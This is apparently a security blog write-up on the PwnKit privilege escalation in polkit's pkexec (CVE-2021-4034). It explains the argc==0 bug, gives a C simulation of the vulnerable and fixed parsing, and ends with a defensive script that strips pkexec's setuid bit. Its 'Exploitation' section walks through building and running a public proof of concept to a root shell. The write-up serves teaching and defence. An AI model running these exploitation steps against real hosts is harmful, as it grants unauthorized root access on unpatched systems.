Greetings everyone! In this write-up I will explain and demonstrate the exploitation of a well-known local privilege escalation vulnerability in Linux, CVE-2021-4034 (PwnKit), which targets polkit's pkexec program.
What is Polkit?
polkit (formerly called PolicyKit) is an authorization framework used to decide whether one Linux process may ask another, more privileged process to perform an action. Take two processes: "Process1" running with high privileges and "Process2" running with low privileges. Process1 receives a request from Process2 to perform some action and has to decide whether the requester is an administrator/system owner or an ordinary user. Instead of deciding this itself, Process1 asks polkit to make the authorization decision. polkit therefore acts as a trusted authority, and it can grant temporary permission after running an authentication step (for example, asking the user for a password).
What is pkexec?
pkexec is a setuid-root command-line tool shipped with polkit that allows a user to execute a program as another user, normally with elevated privileges. Unless another user is specified, pkexec runs the command as root.
Example: a user executes a command using pkexec. pkexec checks whether that user is authorized to execute the command according to the authorization rules defined for polkit, authenticating the user first if the policy requires it.
Where Did the Vulnerability Come From?
The vulnerability (CVE-2021-4034, nicknamed PwnKit by Qualys, who reported it in January 2022) comes from improper handling of the command-line arguments passed to the pkexec binary. pkexec's main() starts parsing at argv[1] and never checks that argc is at least 1. If pkexec is executed with an empty argument list (argc == 0, which execve() allows), argv[1] is actually envp[0], because the kernel places the environment pointers directly after the argument pointers on the stack. pkexec reads the "program name" out of bounds from there, looks it up in PATH, and writes the resolved path back into the same slot, which is an out-of-bounds write into its own environment. An attacker can use this to re-introduce an environment variable such as GCONV_PATH that the dynamic loader strips from a setuid program's environment before main() runs. Later, when pkexec prints an error message, glib converts the message to the character set named by CHARSET through iconv, which consults the gconv-modules file found in GCONV_PATH and loads the shared library it names. Since pkexec is setuid root, the code in that library runs as root. The bug had been present since pkexec's first version in 2009, and patched polkit packages were published by distributions at the time of the disclosure.
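To make the argc == 0 aliasing concrete, here is an added illustration (not pkexec's real source and not an exploit): a simplified copy of the argument-parsing pattern that CVE-2021-4034 abused, beside the check that closes it. The argv/envp layout is simulated in a small array, the string values are constructed samples, and the "resolved" parameter stands in for the path that pkexec's PATH lookup (g_find_program_in_path) would return.

```c
#include <stdio.h>
#include <string.h>

/*
 * Added illustration, not pkexec's real source and not an exploit: a
 * simplified copy of the argument-parsing pattern that CVE-2021-4034 abused,
 * next to the check that closes it. "resolved" stands in for the path that
 * pkexec's PATH lookup (g_find_program_in_path) would return.
 *
 * On Linux the kernel lays argv and envp out back to back on the stack:
 *   argv[0] .. argv[argc-1], NULL, envp[0] .. envp[n-1], NULL
 * so with argc == 0, argv[0] is the NULL terminator and argv[1] is envp[0].
 */

/* Vulnerable pattern: start at index 1, assume argc >= 1, and write the
 * resolved path back into argv[n]. With argc == 0 this reads and then
 * overwrites envp[0]. */
static const char *vulnerable_parse(int argc, char **argv, char *resolved)
{
    int n;
    for (n = 1; n < argc; n++) {
        if (strncmp(argv[n], "--", 2) != 0)
            break;                      /* first non-option is the program */
    }
    if (argv[n] == NULL)                /* out-of-bounds read when argc == 0 */
        return NULL;
    argv[n] = resolved;                 /* out-of-bounds write when argc == 0 */
    return argv[n];
}

/* Hardened pattern: refuse an empty argument vector and never index past argc. */
static const char *hardened_parse(int argc, char **argv, char *resolved)
{
    int n;
    if (argc < 1)
        return NULL;                    /* argv[1] would alias envp[0] */
    for (n = 1; n < argc; n++) {
        if (strncmp(argv[n], "--", 2) != 0)
            break;
    }
    if (n >= argc)
        return NULL;                    /* no program was given */
    argv[n] = resolved;
    return argv[n];
}

/* Simulated stack for argc == 0: argv = {NULL} with envp immediately after.
 * The strings are constructed sample values. */
struct sim {
    char *stack[3];
    char **argv;
    char **envp;
};

static void build_sim(struct sim *s)
{
    s->stack[0] = NULL;                     /* argv[0]: end of an empty argv */
    s->stack[1] = (char *)"GCONV_PATH=.";   /* envp[0]: attacker-controlled */
    s->stack[2] = NULL;
    s->argv = s->stack;
    s->envp = s->stack + 1;
}

/* What envp[0] holds after each parser runs with argc == 0. */
const char *envp0_after_vulnerable(void)
{
    struct sim s;
    build_sim(&s);
    vulnerable_parse(0, s.argv, (char *)"GCONV_PATH=./resolved");
    return s.envp[0];                   /* overwritten by the parser */
}

const char *envp0_after_hardened(void)
{
    struct sim s;
    build_sim(&s);
    hardened_parse(0, s.argv, (char *)"GCONV_PATH=./resolved");
    return s.envp[0];                   /* untouched */
}

int main(void)
{
    printf("vulnerable: envp[0] = %s\n", envp0_after_vulnerable());
    printf("hardened:   envp[0] = %s\n", envp0_after_hardened());
    return 0;
}
```

The vulnerable variant silently turns the environment entry into whatever the PATH lookup returned; the hardened variant returns without touching memory outside argv, which is the shape of the upstream fix (reject argc < 1 and bound the loop by argc).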
Exploitation
The following uses berdav's public proof of concept; it needs only a C compiler and an unpatched setuid pkexec on the target.
>> git clone https://github.com/berdav/CVE-2021-4034
>> cd CVE-2021-4034/
>> ls
cve-2021-4034.c dry-run Makefile README.md
cve-2021-4034.sh LICENSE pwnkit.c
>> make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
>> ls
cve-2021-4034 dry-run LICENSE pwnkit.so
cve-2021-4034.c gconv-modules Makefile README.md
cve-2021-4034.sh 'GCONV_PATH=.' pwnkit.c
The build produces the exploit binary, the malicious shared library pwnkit.so, a gconv-modules file that registers pwnkit.so as the converter for a fake PWNKIT character set, and a directory named GCONV_PATH=. containing an executable file named pwnkit.so:. (a copy of /bin/true). The exploit then runs pkexec with an empty argument list and an environment whose first entry is pwnkit.so:. and whose PATH is GCONV_PATH=.; pkexec finds that file in PATH, writes the resolved path GCONV_PATH=./pwnkit.so:. over envp[0], and when it goes to report an error about its environment, iconv reads ./gconv-modules and loads ./pwnkit.so as root, which spawns the shell:
>> ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root)
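Before or after running the proof of concept, a defender usually wants a quick way to tell whether a host is still exposed and to apply the interim mitigation from the Red Hat advisory (removing the setuid bit from pkexec until the patched polkit package is installed). The script below is an added example, not part of the original write-up or of the berdav repository; it assumes pkexec is at /usr/bin/pkexec (override with PKEXEC=/path) and that find(1) and chmod(1) are available.

```sh
#!/bin/sh
# Added example (not part of the original write-up or of the berdav exploit):
# check pkexec's setuid bit and, on request, apply the temporary mitigation
# from the Red Hat advisory: strip the setuid bit until polkit is patched.
# Assumption: pkexec lives at /usr/bin/pkexec; override with PKEXEC=/path.

PKEXEC="${PKEXEC:-/usr/bin/pkexec}"

# Returns 0 if FILE exists and has the setuid bit (mode 4000) set.
# find(1) is used instead of stat(1) because its -perm syntax is portable.
has_setuid() {
    f="$1"
    [ -e "$f" ] || return 1
    [ -n "$(find "$f" -prune -perm -4000 2>/dev/null)" ]
}

# Print the installed version (if any) and the setuid status of FILE.
# Returns 0 when the binary is still setuid, 1 otherwise.
# The version string alone is not a reliable indicator: distributions
# backported the fix without changing the upstream version number.
report() {
    f="$1"
    if [ -x "$f" ]; then
        "$f" --version 2>/dev/null || true
    fi
    if has_setuid "$f"; then
        echo "$f: setuid bit set; exploitable unless polkit is patched"
        return 0
    fi
    echo "$f: setuid bit not set; pkexec cannot elevate, PwnKit is mitigated"
    return 1
}

# Mitigation, not a fix: strip the setuid bit. Needs root, and it breaks
# pkexec for every legitimate user until the patched package is installed.
strip_setuid() {
    chmod 0755 "$1"
}

# Usage:  ./pkexec-check.sh              (report only)
#         sudo ./pkexec-check.sh mitigate (report, strip setuid, report again)
case "${1:-}" in
    mitigate) report "$PKEXEC" && strip_setuid "$PKEXEC"; report "$PKEXEC" || : ;;
    *)        report "$PKEXEC" || : ;;
esac
```

Re-run the report after the package update to confirm the patched pkexec is setuid again; the exploit only works while the bit is set and the binary is unpatched.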
References
https://manpages.ubuntu.com/manpages/focal/en/man8/polkit.8.html
https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
https://access.redhat.com/security/vulnerabilities/RHSB-2022-001